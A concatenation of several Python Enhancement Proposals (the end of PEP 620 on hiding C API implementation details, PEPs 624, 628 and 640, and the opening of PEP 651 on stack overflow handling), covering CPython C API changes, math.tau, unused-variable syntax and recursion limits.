CPython still tracks Python objects lifetime using reference counting
internally and for third party C extensions (through the Python C API).
All Python objects must be allocated on the heap and cannot be moved.
Why is PyPy more efficient than CPython?
The PyPy project is a Python implementation which is 4.2x faster than
CPython on average. PyPy developers chose to not fork CPython, but start
from scratch to have more freedom in terms of optimization choices.
PyPy does not use reference counting, but a tracing garbage collector
which moves objects. Objects can be allocated on the stack (or even not
at all), rather than always having to be allocated on the heap.
Objects layouts are designed with performance in mind. For example, a
list strategy stores integers directly as integers, rather than objects.
Moreover, PyPy also has a JIT compiler which emits fast code thanks to
the efficient PyPy design.
PyPy bottleneck: the Python C API
While PyPy is way more efficient than CPython to run pure Python code,
it is as efficient or slower than CPython to run C extensions.
Since the C API requires PyObject* and allows to access directly
structure members, PyPy has to associate a CPython object to PyPy
objects and maintain both consistent. Converting a PyPy object to a
CPython object is inefficient. Moreover, reference counting also has to
be implemented on top of PyPy tracing garbage collector.
These conversions are required because the Python C API is too close to
the CPython implementation: there is no high-level abstraction.
For example, structures members are part of the public C API and nothing
prevents a C extension to get or set directly
PyTupleObject.ob_item[0] (the first item of a tuple).
See Inside cpyext: Why emulating CPython C API is so Hard
(Sept 2018) by Antonio Cuni for more details.
Rationale
Hide implementation details
Hiding implementation details from the C API has multiple advantages:
It becomes possible to experiment with more advanced optimizations in
CPython than just micro-optimizations. For example, tagged pointers,
and replace the garbage collector with a tracing garbage collector
which can move objects.
Adding new features in CPython becomes easier.
PyPy should be able to avoid conversions to CPython objects in more
cases: keep efficient PyPy objects.
It becomes easier to implement the C API for a new Python
implementation.
More C extensions will be compatible with Python implementations other
than CPython.
Relationship with the limited C API
The PEP 384 “Defining a Stable ABI” is implemented in Python 3.4. It introduces the
“limited C API”: a subset of the C API. When the limited C API is used,
it becomes possible to build a C extension only once and use it on
multiple Python versions: that’s the stable ABI.
The main limitation of the PEP 384 is that C extensions have to opt-in
for the limited C API. Only very few projects made this choice,
usually to ease distribution of binaries, especially on Windows.
This PEP moves the C API towards the limited C API.
Ideally, the C API will become the limited C API and all C extensions
will use the stable ABI, but this is out of this PEP scope.
Specification
Summary
(Completed) Reorganize the C API header files: create Include/cpython/ and
Include/internal/ subdirectories.
(Completed) Move private functions exposing implementation details to the internal
C API.
(Completed) Convert macros to static inline functions.
(Completed) Add new functions Py_SET_TYPE(), Py_SET_REFCNT() and
Py_SET_SIZE(). The Py_TYPE(), Py_REFCNT() and
Py_SIZE() macros become functions which cannot be used as l-value.
(Completed) New C API functions must not return borrowed
references.
(In Progress) Provide pythoncapi_compat.h header file.
(In Progress) Make structures opaque, add getter and setter
functions.
(Not Started) Deprecate PySequence_Fast_ITEMS().
(Not Started) Convert PyTuple_GET_ITEM() and
PyList_GET_ITEM() macros to static inline functions.
Reorganize the C API header files
The first consumer of the C API was Python itself. There is no clear
separation between APIs which must not be used outside Python, and API
which are public on purpose.
Header files must be reorganized in 3 API:
Include/ directory is the limited C API: no implementation
details, structures are opaque. C extensions using it get a stable
ABI.
Include/cpython/ directory is the CPython C API: less “portable”
API, depends more on the Python version, expose some implementation
details, few incompatible changes can happen.
Include/internal/ directory is the internal C API: implementation
details, incompatible changes are likely at each Python release.
The creation of the Include/cpython/ directory is fully backward
compatible. Include/cpython/ header files cannot be included
directly and are included automatically by Include/ header files
when the Py_LIMITED_API macro is not defined.
The internal C API is installed and can be used for specific usage like
debuggers and profilers which must access structures members without
executing code. C extensions using the internal C API are tightly
coupled to a Python version and must be recompiled at each Python
version.
STATUS: Completed (in Python 3.8)
The reorganization of header files started in Python 3.7 and was
completed in Python 3.8:
bpo-35134: Add a new
Include/cpython/ subdirectory for the “CPython API” with
implementation details.
bpo-35081: Move internal
headers to Include/internal/
Move private functions to the internal C API
Private functions which expose implementation details must be moved to
the internal C API.
If a C extension relies on a CPython private function which exposes
CPython implementation details, other Python implementations have to
re-implement this private function to support this C extension.
STATUS: Completed (in Python 3.9)
Private functions moved to the internal C API in Python 3.8:
_PyObject_GC_TRACK(), _PyObject_GC_UNTRACK()
Macros and functions excluded from the limited C API in Python 3.9:
_PyObject_SIZE(), _PyObject_VAR_SIZE()
PyThreadState_DeleteCurrent()
PyFPE_START_PROTECT(), PyFPE_END_PROTECT()
_Py_NewReference(), _Py_ForgetReference()
_PyTraceMalloc_NewReference()
_Py_GetRefTotal()
Private functions moved to the internal C API in Python 3.9:
GC functions like _Py_AS_GC(), _PyObject_GC_IS_TRACKED()
and _PyGCHead_NEXT()
_Py_AddToAllObjects() (not exported)
_PyDebug_PrintTotalRefs(), _Py_PrintReferences(),
_Py_PrintReferenceAddresses() (not exported)
Public “clear free list” functions moved to the internal C API and
renamed to private functions in Python 3.9:
PyAsyncGen_ClearFreeLists()
PyContext_ClearFreeList()
PyDict_ClearFreeList()
PyFloat_ClearFreeList()
PyFrame_ClearFreeList()
PyList_ClearFreeList()
PyTuple_ClearFreeList()
Functions simply removed:
PyMethod_ClearFreeList() and PyCFunction_ClearFreeList():
bound method free list removed in Python 3.9.
PySet_ClearFreeList(): set free list removed in Python 3.4.
PyUnicode_ClearFreeList(): Unicode free list removed
in Python 3.3.
Convert macros to static inline functions
Converting macros to static inline functions has multiple advantages:
Functions have well defined parameter types and return type.
Functions can use variables with a well defined scope (the function).
Debugger can be put breakpoints on functions and profilers can display
the function name in the call stacks. In most cases, it works even
when a static inline function is inlined.
Functions don’t have macros pitfalls.
Converting macros to static inline functions should only impact very few
C extensions that use macros in unusual ways.
For backward compatibility, functions must continue to accept any type,
not only PyObject*, to avoid compiler warnings, since most macros
cast their parameters to PyObject*.
Python 3.6 requires C compilers to support static inline functions: the
PEP 7 requires a subset of C99.
STATUS: Completed (in Python 3.9)
Macros converted to static inline functions in Python 3.8:
Py_INCREF(), Py_DECREF()
Py_XINCREF(), Py_XDECREF()
PyObject_INIT(), PyObject_INIT_VAR()
_PyObject_GC_TRACK(), _PyObject_GC_UNTRACK(), _Py_Dealloc()
Macros converted to regular functions in Python 3.9:
Py_EnterRecursiveCall(), Py_LeaveRecursiveCall()
(added to the limited C API)
PyObject_INIT(), PyObject_INIT_VAR()
PyObject_GET_WEAKREFS_LISTPTR()
PyObject_CheckBuffer()
PyIndex_Check()
PyObject_IS_GC()
PyObject_NEW() (alias to PyObject_New()),
PyObject_NEW_VAR() (alias to PyObject_NewVar())
PyType_HasFeature() (always call PyType_GetFlags())
Py_TRASHCAN_BEGIN_CONDITION() and Py_TRASHCAN_END() macros
now call functions which hide implementation details, rather than
accessing directly members of the PyThreadState structure.
Make structures opaque
The following structures of the C API become opaque:
PyInterpreterState
PyThreadState
PyGC_Head
PyTypeObject
PyObject and PyVarObject
PyTypeObject
All types which inherit from PyObject or PyVarObject
C extensions must use getter or setter functions to get or set structure
members. For example, tuple->ob_item[0] must be replaced with
PyTuple_GET_ITEM(tuple, 0).
To be able to move away from reference counting, PyObject must
become opaque. Currently, the reference counter PyObject.ob_refcnt
is exposed in the C API. All structures must become opaque, since they
“inherit” from PyObject. For, PyFloatObject inherits from
PyObject:
typedef struct {
PyObject ob_base;
double ob_fval;
} PyFloatObject;
Making PyObject fully opaque requires converting Py_INCREF() and
Py_DECREF() macros to function calls. This change has an impact on
performance. It is likely to be one of the very last changes when making
structures opaque.
Making PyTypeObject structure opaque breaks C extensions declaring
types statically (e.g. static PyTypeObject MyType = {...};). C
extensions must use PyType_FromSpec() to allocate types on the heap
instead. Using heap types has other advantages like being compatible
with subinterpreters. Combined with PEP 489 “Multi-phase extension
module initialization”, it makes a C extension behavior closer to a
Python module, like allowing to create more than one module instance.
Making PyThreadState structure opaque requires adding getter and
setter functions for members used by C extensions.
STATUS: In Progress (started in Python 3.8)
The PyInterpreterState structure was made opaque in Python 3.8
(bpo-35886) and the
PyGC_Head structure (bpo-40241) was made opaque in Python 3.9.
Issues tracking the work to prepare the C API to make following
structures opaque:
PyObject: bpo-39573
PyTypeObject: bpo-40170
PyFrameObject: bpo-40421
Python 3.9 adds PyFrame_GetCode() and PyFrame_GetBack()
getter functions, and moves PyFrame_GetLineNumber to the limited
C API.
PyThreadState: bpo-39947
Python 3.9 adds 3 getter functions: PyThreadState_GetFrame(),
PyThreadState_GetID(), PyThreadState_GetInterpreter().
Disallow using Py_TYPE() as l-value
The Py_TYPE() function gets an object type, its PyObject.ob_type
member. It is implemented as a macro which can be used as an l-value to
set the type: Py_TYPE(obj) = new_type. This code relies on the
assumption that PyObject.ob_type can be modified directly. It
prevents making the PyObject structure opaque.
New setter functions Py_SET_TYPE(), Py_SET_REFCNT() and
Py_SET_SIZE() are added and must be used instead.
The Py_TYPE(), Py_REFCNT() and Py_SIZE() macros must be
converted to static inline functions which can not be used as l-value.
For example, the Py_TYPE() macro:
#define Py_TYPE(ob) (((PyObject*)(ob))->ob_type)
becomes:
#define _PyObject_CAST_CONST(op) ((const PyObject*)(op))
static inline PyTypeObject* _Py_TYPE(const PyObject *ob) {
return ob->ob_type;
}
#define Py_TYPE(ob) _Py_TYPE(_PyObject_CAST_CONST(ob))
STATUS: Completed (in Python 3.10)
New functions Py_SET_TYPE(), Py_SET_REFCNT() and
Py_SET_SIZE() were added to Python 3.9.
In Python 3.10, Py_TYPE(), Py_REFCNT() and Py_SIZE() can no
longer be used as l-value and the new setter functions must be used
instead.
New C API functions must not return borrowed references
When a function returns a borrowed reference, Python cannot track when
the caller stops using this reference.
For example, if the Python list type is specialized for small
integers, store directly “raw” numbers rather than Python objects,
PyList_GetItem() has to create a temporary Python object. The
problem is to decide when it is safe to delete the temporary object.
The general guidelines is to avoid returning borrowed references for new
C API functions.
No function returning borrowed references is scheduled for removal by
this PEP.
STATUS: Completed (in Python 3.9)
In Python 3.9, new C API functions returning Python objects only return
strong references:
PyFrame_GetBack()
PyFrame_GetCode()
PyObject_CallNoArgs()
PyObject_CallOneArg()
PyThreadState_GetFrame()
Avoid functions returning PyObject**
The PySequence_Fast_ITEMS() function gives a direct access to an
array of PyObject* objects. The function is deprecated in favor of
PyTuple_GetItem() and PyList_GetItem().
PyTuple_GET_ITEM() can be abused to access directly the
PyTupleObject.ob_item member:
PyObject **items = &PyTuple_GET_ITEM(0);
The PyTuple_GET_ITEM() and PyList_GET_ITEM() macros are
converted to static inline functions to disallow that.
STATUS: Not Started
New pythoncapi_compat.h header file
Making structures opaque requires modifying C extensions to
use getter and setter functions. The practical issue is how to keep
support for old Python versions which don’t have these functions.
For example, in Python 3.10, it is no longer possible to use
Py_TYPE() as an l-value. The new Py_SET_TYPE() function must be
used instead:
#if PY_VERSION_HEX >= 0x030900A4
Py_SET_TYPE(&MyType, &PyType_Type);
#else
Py_TYPE(&MyType) = &PyType_Type;
#endif
This code may ring a bell to developers who ported their Python code
base from Python 2 to Python 3.
Python will distribute a new pythoncapi_compat.h header file which
provides new C API functions to old Python versions. Example:
#if PY_VERSION_HEX < 0x030900A4
static inline void
_Py_SET_TYPE(PyObject *ob, PyTypeObject *type)
{
ob->ob_type = type;
}
#define Py_SET_TYPE(ob, type) _Py_SET_TYPE((PyObject*)(ob), type)
#endif // PY_VERSION_HEX < 0x030900A4
Using this header file, Py_SET_TYPE() can be used on old Python
versions as well.
Developers can copy this file in their project, or even to only
copy/paste the few functions needed by their C extension.
STATUS: In Progress (implemented but not distributed by CPython yet)
The pythoncapi_compat.h header file is currently developed at:
https://github.com/pythoncapi/pythoncapi_compat
Process to reduce the number of broken C extensions
Process to reduce the number of broken C extensions when introducing C
API incompatible changes listed in this PEP:
Estimate how many popular C extensions are affected by the
incompatible change.
Coordinate with maintainers of broken C extensions to prepare their
code for the future incompatible change.
Introduce the incompatible changes in Python. The documentation must
explain how to port existing code. It is recommended to merge such
changes at the beginning of a development cycle to have more time for
tests.
Changes which are the most likely to break a large number of C
extensions should be announced on the capi-sig mailing list to notify
C extensions maintainers to prepare their project for the next Python.
If the change breaks too many projects, reverting the change should be
discussed, taking in account the number of broken packages, their
importance in the Python community, and the importance of the change.
The coordination usually means reporting issues to the projects, or even
proposing changes. It does not require waiting for a new release including
fixes for every broken project.
Since more and more C extensions are written using Cython, rather
directly using the C API, it is important to ensure that Cython is
prepared in advance for incompatible changes. It gives more time for C
extension maintainers to release a new version with code generated with
the updated Cython (for C extensions distributing the code generated by
Cython).
Future incompatible changes can be announced by deprecating a function
in the documentation and by annotating the function with
Py_DEPRECATED(). But making a structure opaque and preventing the
usage of a macro as l-value cannot be deprecated with
Py_DEPRECATED().
The important part is coordination and finding a balance between CPython
evolutions and backward compatibility. For example, breaking a random,
old, obscure and unmaintained C extension on PyPI is less severe than
breaking numpy.
If a change is reverted, we move back to the coordination step to better
prepare the change. Once more C extensions are ready, the incompatible
change can be reconsidered.
Version History
Version 3, June 2020: PEP rewritten from scratch. Python now
distributes a new pythoncapi_compat.h header and a process is
defined to reduce the number of broken C extensions when introducing C
API incompatible changes listed in this PEP.
Version 2, April 2020:
PEP: Modify the C API to hide implementation details.
Version 1, July 2017:
PEP: Hide implementation details in the C API
sent to python-ideas
Copyright
This document has been placed in the public domain.
| Withdrawn | PEP 620 – Hide implementation details from the C API | Standards Track | Introduce C API incompatible changes to hide implementation details. |
PEP 624 – Remove Py_UNICODE encoder APIs
Author:
Inada Naoki <songofacandy at gmail.com>
Status:
Final
Type:
Standards Track
Created:
06-Jul-2020
Python-Version:
3.11
Post-History:
08-Jul-2020
Table of Contents
Abstract
Motivation
Rationale
Deprecated since Python 3.3
Inefficient
Not used widely
Alternative APIs
Plan
Alternative Ideas
Replace Py_UNICODE* with PyObject*
Replace Py_UNICODE* with Py_UCS4*
Replace Py_UNICODE* with wchar_t*
Rejected Ideas
Emit runtime warning
Discussions
Objections
References
Copyright
Abstract
This PEP proposes to remove deprecated Py_UNICODE encoder APIs in Python 3.11:
PyUnicode_Encode()
PyUnicode_EncodeASCII()
PyUnicode_EncodeLatin1()
PyUnicode_EncodeUTF7()
PyUnicode_EncodeUTF8()
PyUnicode_EncodeUTF16()
PyUnicode_EncodeUTF32()
PyUnicode_EncodeUnicodeEscape()
PyUnicode_EncodeRawUnicodeEscape()
PyUnicode_EncodeCharmap()
PyUnicode_TranslateCharmap()
PyUnicode_EncodeDecimal()
PyUnicode_TransformDecimalToASCII()
Note
PEP 623 propose to remove
Unicode object APIs relating to Py_UNICODE. On the other hand, this PEP
is not relating to Unicode object. These PEPs are split because they have
different motivations and need different discussions.
Motivation
In general, reducing the number of APIs that have been deprecated for
a long time and have few users is a good idea for not only it
improves the maintainability of CPython, but it also helps API users
and other Python implementations.
Rationale
Deprecated since Python 3.3
Py_UNICODE and APIs using it has been deprecated since Python 3.3.
Inefficient
All of these APIs are implemented using PyUnicode_FromWideChar.
So these APIs are inefficient when user want to encode Unicode
object.
Not used widely
When searching from the top 4000 PyPI packages [1], only pyodbc use
these APIs.
PyUnicode_EncodeUTF8()
PyUnicode_EncodeUTF16()
pyodbc uses these APIs to encode Unicode object into bytes object.
So it is easy to fix it. [2]
Alternative APIs
There are alternative APIs to accept PyObject *unicode instead of
Py_UNICODE *. Users can migrate to them.
Deprecated API
Alternative APIs
PyUnicode_Encode()
PyUnicode_AsEncodedString()
PyUnicode_EncodeASCII()
PyUnicode_AsASCIIString() (1)
PyUnicode_EncodeLatin1()
PyUnicode_AsLatin1String() (1)
PyUnicode_EncodeUTF7()
(2)
PyUnicode_EncodeUTF8()
PyUnicode_AsUTF8String() (1)
PyUnicode_EncodeUTF16()
PyUnicode_AsUTF16String() (3)
PyUnicode_EncodeUTF32()
PyUnicode_AsUTF32String() (3)
PyUnicode_EncodeUnicodeEscape()
PyUnicode_AsUnicodeEscapeString()
PyUnicode_EncodeRawUnicodeEscape()
PyUnicode_AsRawUnicodeEscapeString()
PyUnicode_EncodeCharmap()
PyUnicode_AsCharmapString() (1)
PyUnicode_TranslateCharmap()
PyUnicode_Translate()
PyUnicode_EncodeDecimal()
(4)
PyUnicode_TransformDecimalToASCII()
(4)
Notes:
const char *errors parameter is missing.
There is no public alternative API. But user can use generic
PyUnicode_AsEncodedString() instead.
const char *errors, int byteorder parameters are missing.
There is no direct replacement. But Py_UNICODE_TODECIMAL
can be used instead. CPython uses
_PyUnicode_TransformDecimalAndSpaceToASCII for converting
from Unicode to numbers instead.
Plan
Remove these APIs in Python 3.11. They have been deprecated already.
PyUnicode_Encode()
PyUnicode_EncodeASCII()
PyUnicode_EncodeLatin1()
PyUnicode_EncodeUTF7()
PyUnicode_EncodeUTF8()
PyUnicode_EncodeUTF16()
PyUnicode_EncodeUTF32()
PyUnicode_EncodeUnicodeEscape()
PyUnicode_EncodeRawUnicodeEscape()
PyUnicode_EncodeCharmap()
PyUnicode_TranslateCharmap()
PyUnicode_EncodeDecimal()
PyUnicode_TransformDecimalToASCII()
Alternative Ideas
Replace Py_UNICODE* with PyObject*
As described in the “Alternative APIs” section, some APIs don’t have
public alternative APIs accepting PyObject *unicode input.
And some public alternative APIs have restrictions like missing
errors and byteorder parameters.
Instead of removing deprecated APIs, we can reuse their names for
alternative public APIs.
Since we have private alternative APIs already, it is just renaming
from private name to public and deprecated names.
Rename to
Rename from
PyUnicode_EncodeASCII()
_PyUnicode_AsASCIIString()
PyUnicode_EncodeLatin1()
_PyUnicode_AsLatin1String()
PyUnicode_EncodeUTF7()
_PyUnicode_EncodeUTF7()
PyUnicode_EncodeUTF8()
_PyUnicode_AsUTF8String()
PyUnicode_EncodeUTF16()
_PyUnicode_EncodeUTF16()
PyUnicode_EncodeUTF32()
_PyUnicode_EncodeUTF32()
Pros:
We have a more consistent API set.
Cons:
Backward incompatible.
We have more public APIs to maintain for rare use cases.
Existing public APIs are enough for most use cases, and
PyUnicode_AsEncodedString() can be used in other cases.
Replace Py_UNICODE* with Py_UCS4*
We can replace Py_UNICODE with Py_UCS4 and undeprecate
these APIs.
UTF-8, UTF-16, UTF-32 encoders support Py_UCS4 internally.
So PyUnicode_EncodeUTF8(), PyUnicode_EncodeUTF16(), and
PyUnicode_EncodeUTF32() can avoid to create a temporary Unicode
object.
Pros:
We can avoid creating temporary Unicode object when encoding from
Py_UCS4* into bytes object with UTF-8, UTF-16, UTF-32 codecs.
Cons:
Backward incompatible.
We have more public APIs to maintain for rare use cases.
Other Python implementations that want to support Python/C API need
to support these APIs too.
If we change the Unicode internal representation to UTF-8 in the
future, we need to keep UCS-4 support only for these APIs.
Replace Py_UNICODE* with wchar_t*
We can replace Py_UNICODE with wchar_t. Since Py_UNICODE
is typedef of wchar_t already, this is status quo.
On platforms where sizeof(wchar_t) == 4, we can avoid to create a
temporary Unicode object when encoding from wchar_t* to bytes
objects using UTF-8, UTF-16, and UTF-32 codec, like the “Replace
Py_UNICODE* with Py_UCS4*” idea.
Pros:
Backward compatible.
We can avoid creating temporary Unicode object when encode from
Py_UCS4* into bytes object with UTF-8, UTF-16, UTF-32 codecs
on platform where sizeof(wchar_t) == 4.
Cons:
Although Windows is the most major platform that uses wchar_t
heavily, these APIs need to create a temporary Unicode object
always because sizeof(wchar_t) == 2 on Windows.
We have more public APIs to maintain for rare use cases.
Other Python implementations that want to support Python/C API need
to support these APIs too.
If we change the Unicode internal representation to UTF-8 in the
future, we need to keep UCS-4 support only for these APIs.
Rejected Ideas
Emit runtime warning
In addition to existing compiler warning, emitting runtime
DeprecationWarning is suggested.
But these APIs doesn’t release GIL for now. Emitting a warning from
such APIs is not safe. See this example.
PyObject *u = PyList_GET_ITEM(list, i); // u is borrowed reference.
PyObject *b = PyUnicode_EncodeUTF8(PyUnicode_AS_UNICODE(u),
PyUnicode_GET_SIZE(u), NULL);
// Assumes u is still living reference.
PyObject *t = PyTuple_Pack(2, u, b);
Py_DECREF(b);
return t;
If we emit Python warning from PyUnicode_EncodeUTF8(), warning
filters and other threads may change the list and u can be
a dangling reference after PyUnicode_EncodeUTF8() returned.
Discussions
[python-dev] Plan to remove Py_UNICODE APis except PEP 623
bpo-41123: Remove Py_UNICODE APIs except PEP 623
[python-dev] PEP 624: Remove Py_UNICODE encoder APIs
Objections
Removing these APIs removes ability to use codec without temporary
Unicode.
Codecs can not encode Unicode buffer directly without temporary
Unicode object since Python 3.3. All these APIs creates temporary
Unicode object for now. So removing them doesn’t reduce any
abilities.
Why not remove decoder APIs too?
They are part of stable ABI.
PyUnicode_DecodeASCII() and PyUnicode_DecodeUTF8() are
used very widely. Deprecating them is not worth enough.
Decoder APIs can decode from byte buffer directly, without
creating temporary bytes object. On the other hand, encoder APIs
can not avoid temporary Unicode object.
References
[1]
Source package list chosen from top 4000 PyPI packages.
(https://github.com/methane/notes/blob/master/2020/wchar-cache/package_list.txt)
[2]
pyodbc – Don’t use PyUnicode_Encode API #792
(https://github.com/mkleehammer/pyodbc/pull/792)
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Final | PEP 624 – Remove Py_UNICODE encoder APIs | Standards Track | This PEP proposes to remove deprecated Py_UNICODE encoder APIs in Python 3.11: |
PEP 628 – Add math.tau
Author:
Alyssa Coghlan <ncoghlan at gmail.com>
Status:
Final
Type:
Standards Track
Created:
28-Jun-2011
Python-Version:
3.6
Post-History:
28-Jun-2011
Table of Contents
Abstract
PEP Acceptance
The Rationale for Tau
Other Resources
Copyright
Abstract
In honour of Tau Day 2011, this PEP proposes the addition of the circle
constant math.tau to the Python standard library.
The concept of tau (τ) is based on the observation that the ratio of a
circle’s circumference to its radius is far more fundamental and interesting
than the ratio between its circumference and diameter. It is simply a matter
of assigning a name to the value 2 * pi (2π).
PEP Acceptance
This PEP is now accepted and math.tau will be a part of Python 3.6.
Happy birthday Alyssa!
The idea in this PEP has been implemented in the auspiciously named
issue 12345.
The Rationale for Tau
pi is defined as the ratio of a circle’s circumference to its diameter.
However, a circle is defined by its centre point and its radius. This is
shown clearly when we note that the parameter of integration to go from a
circle’s circumference to its area is the radius, not the diameter. If we
use the diameter instead we have to divide by four to get rid of the
extraneous multiplier.
When working with radians, it is trivial to convert any given fraction of a
circle to a value in radians in terms of tau. A quarter circle is
tau/4, a half circle is tau/2, seven 25ths is 7*tau/25, etc. In
contrast with the equivalent expressions in terms of pi (pi/2, pi,
14*pi/25), the unnecessary and needlessly confusing multiplication by
two is gone.
Other Resources
I’ve barely skimmed the surface of the many examples put forward to point out
just how much easier and more sensible many aspects of mathematics become
when conceived in terms of tau rather than pi. If you don’t find my
specific examples sufficiently persuasive, here are some more resources that
may be of interest:
Michael Hartl is the primary instigator of Tau Day in his Tau Manifesto
Bob Palais, the author of the original mathematics journal article
highlighting the problems with pi has a page of resources on the
topic
For those that prefer videos to written text, Pi is wrong! and
Pi is (still) wrong are available on YouTube
Copyright
This document has been placed in the public domain.
| Final | PEP 628 – Add math.tau | Standards Track | In honour of Tau Day 2011, this PEP proposes the addition of the circle
constant math.tau to the Python standard library. |
PEP 640 – Unused variable syntax
Author:
Thomas Wouters <thomas at python.org>
Status:
Rejected
Type:
Standards Track
Created:
04-Oct-2020
Python-Version:
3.10
Post-History:
19-Oct-2020
Resolution:
Python-Dev message
Table of Contents
Rejection Note
Abstract
Motivation
Rationale
Specification
Backwards Compatibility
How to Teach This
Reference Implementation
Rejected Ideas
Open Issues
Copyright
Rejection Note
Rejected by the Steering Council:
https://mail.python.org/archives/list/[email protected]/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3/
Abstract
This PEP proposes new syntax for unused variables, providing a pseudo-name
that can be assigned to but not otherwise used. The assignment doesn’t
actually happen, and the value is discarded instead.
Motivation
In Python it is somewhat common to need to do an assignment without actually
needing the result. Conventionally, people use either "_" or a name such
as "unused" (or with "unused" as a prefix) for this. It’s most
common in unpacking assignments:
x, unused, z = range(3)
x, *unused, z = range(10)
It’s also used in for loops and comprehensions:
for unused in range(10): ...
[ SpamObject() for unused in range(10) ]
The use of "_" in these cases is probably the most common, but it
potentially conflicts with the use of "_" in internationalization, where
a call like gettext.gettext() is bound to "_" and used to mark strings
for translation.
In the proposal to add Pattern Matching to Python (originally PEP 622, now
split into PEP 634, PEP 635 and PEP 636), "_" has an additional
special meaning. It is a wildcard pattern, used in places where variables
could be assigned to, to indicate anything should be matched but not
assigned to anything. The choice of "_" there matches the use of "_"
in other languages, but the semantic difference with "_" elsewhere in
Python is significant.
This PEP proposes to allow a special token, "?", to be used instead of
any valid name in assignment. This has most of the benefits of "_"
without affecting other uses of that otherwise regular variable. Allowing
the use of the same wildcard pattern would make pattern matching and
unpacking assignment more consistent with each other.
Rationale
Marking certain variables as unused is a useful tool, as it helps clarity of
purpose of the code. It makes it obvious to readers of the code as well as
automated linters, that a particular variable is intentionally unused.
However, despite the convention, "_" is not a special variable. The
value is still assigned to, the object it refers to is still kept alive
until the end of the scope, and it can still be used. Nor is the use of
"_" for unused variables entirely ubiquitous, since it conflicts with
conventional internationalization, it isn’t obvious that it is a regular
variable, and it isn’t as obviously unused like a variable named
"unused".
In the Pattern Matching proposal, the use of "_" for wildcard patterns
side-steps the problems of "_" for unused variables by virtue of it
being in a separate scope. The only conflict it has with
internationalization is one of potential confusion, it will not actually
interact with uses of a global variable called "_". However, the
special-casing of "_" for this wildcard pattern purpose is still
problematic: the different semantics and meaning of "_" inside pattern
matching and outside of it means a break in consistency in Python.
Introducing "?" as special syntax for unused variables both inside and
outside pattern matching allows us to retain that consistency. It avoids
the conflict with internationalization or any other uses of _ as a
variable. It makes unpacking assignment align more closely with pattern
matching, making it easier to explain pattern matching as an extension of
unpacking assignment.
In terms of code readability, using a special token makes it easier to find
out what it means ("what does question mark in Python do" versus "why
is my _ variable not getting assigned to"), and makes it more obvious that
the actual intent is for the value to be unused – since it is entirely
impossible to use it.
Specification
A new token is introduced, "?", or token.QMARK.
The grammar is modified to allow "?" in assignment contexts
(star_atom and t_atom in the current grammar), creating a Name
AST node with identifier set to NULL.
The AST is modified to allow the Name expression’s identifier to be
optional (it is currently required). The identifier being empty would only
be allowed in a STORE context.
In CPython, the bytecode compiler is modified to emit POP_TOP instead of
STORE_NAME for Name nodes with no identifier. Other uses of the
Name node are updated to handle the identifier being empty, as
appropriate.
The uses of the modified grammar nodes encompass at least the following
forms of assignment:
? = ...
x, ?, z = ...
x, *?, z = ...
for ? in range(3): ... # including comprehension forms
for x, ?, z in matrix: ... # including comprehension forms
with open(f) as ?: ...
with func() as (x, ?, z): ...
The use of a single "?", not in an unpacking context, is allowed in
normal assignment and the with statement. It doesn’t really make sense
on its own, and it is possible to disallow those specific cases. However,
for ? in range(3) clearly has its uses, so for consistency reasons if
nothing else it seems more sensible to allow the use of the single "?"
in other cases.
Using "?" in augmented assignment (? *= 2) is not allowed, since
"?" can only be used for assignment. Having multiple occurrences of
"?" is valid, just like when assigning to names, and the assignments do
not interfere with each other.
Backwards Compatibility
Introducing a new token means there are no backward compatibility concerns.
No valid syntax changes meaning.
"?" is not considered an identifier, so str.isidentifier() does not
change.
The AST does change in an incompatible way, as the identifier of a Name
token can now be empty. Code using the AST will have to be adjusted
accordingly.
How to Teach This
"?" can be introduced along with unpacking assignment, explaining it is
special syntax for ‘unused’ and mentioning that it can also be used in other
places. Alternatively, it could be introduced as part of an explanation on
assignment in for loops, showing an example where the loop variable is
unused.
PEP 636 discusses how to teach "_", and can simply replace "_" with
"?", perhaps noting that "?" is similarly usable in other contexts.
Reference Implementation
A prototype implementation exists at
<https://github.com/Yhg1s/cpython/tree/nonassign>.
Rejected Ideas
Open Issues
Should "?" be allowed in the following contexts:
# imports done for side-effect only.
import os as ?
from os import path as ?
# Function defined for side-effects only (e.g. decorators)
@register_my_func
def ?(...): ...
# Class defined for side-effects only (e.g. decorators, __init_subclass__)
class ?(...): ...
# Parameters defined for unused positional-only arguments:
def f(a, ?, ?): ...
lambda a, ?, ?: ...
# Unused variables with type annotations:
?: int = f()
# Exception handling:
try: ...
except Exception as ?: ...
# With blocks:
with open(f) as ?: ...
Some of these may seem to make sense from a consistency point of view, but
practical uses are limited and dubious. Type annotations on "?" and
using it with except and with do not seem to make any sense. In the
reference implementation, except is not supported (the existing syntax
only allows a name) but with is (by virtue of the existing syntax
supporting unpacking assignment).
Should this PEP be accepted even if pattern matching is rejected?
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Rejected | PEP 640 – Unused variable syntax | Standards Track | This PEP proposes new syntax for unused variables, providing a pseudo-name
that can be assigned to but not otherwise used. The assignment doesn’t
actually happen, and the value is discarded instead. |
PEP 651 – Robust Stack Overflow Handling
Author:
Mark Shannon <mark at hotpy.org>
Status:
Rejected
Type:
Standards Track
Created:
18-Jan-2021
Post-History:
19-Jan-2021
Table of Contents
Rejection Notice
Abstract
Motivation
Rationale
Specification
StackOverflow exception
RecursionOverflow exception
Decoupling the Python stack from the C stack
Other Implementations
C-API
Py_CheckStackDepth()
Py_EnterRecursiveCall()
PyLeaveRecursiveCall()
Backwards Compatibility
Security Implications
Performance Impact
Implementation
Monitoring C stack consumption
Making Python-to-Python calls without consuming the C stack
Rejected Ideas
Open Issues
Copyright
Rejection Notice
This PEP has been rejected by the Python Steering Council.
Abstract
This PEP proposes that Python should treat machine stack overflow differently from runaway recursion.
This would allow programs to set the maximum recursion depth to fit their needs
and provide additional safety guarantees.
If this PEP is accepted, then the following program will run safely to completion:
sys.setrecursionlimit(1_000_000)
def f(n):
if n:
f(n-1)
f(500_000)
and the following program will raise a StackOverflow, without causing a VM crash:
sys.setrecursionlimit(1_000_000)
class X:
def __add__(self, other):
return self + other
X() + 1
Motivation
CPython uses a single recursion depth counter to prevent both runaway recursion and C stack overflow.
However, runaway recursion and machine stack overflow are two different things.
Allowing machine stack overflow is a potential security vulnerability, but limiting recursion depth can prevent the
use of some algorithms in Python.
Currently, if a program needs to deeply recurse it must manage the maximum recursion depth allowed,
hopefully managing to set it in the region between the minimum needed to run correctly and the maximum that is safe
to avoid a memory protection error.
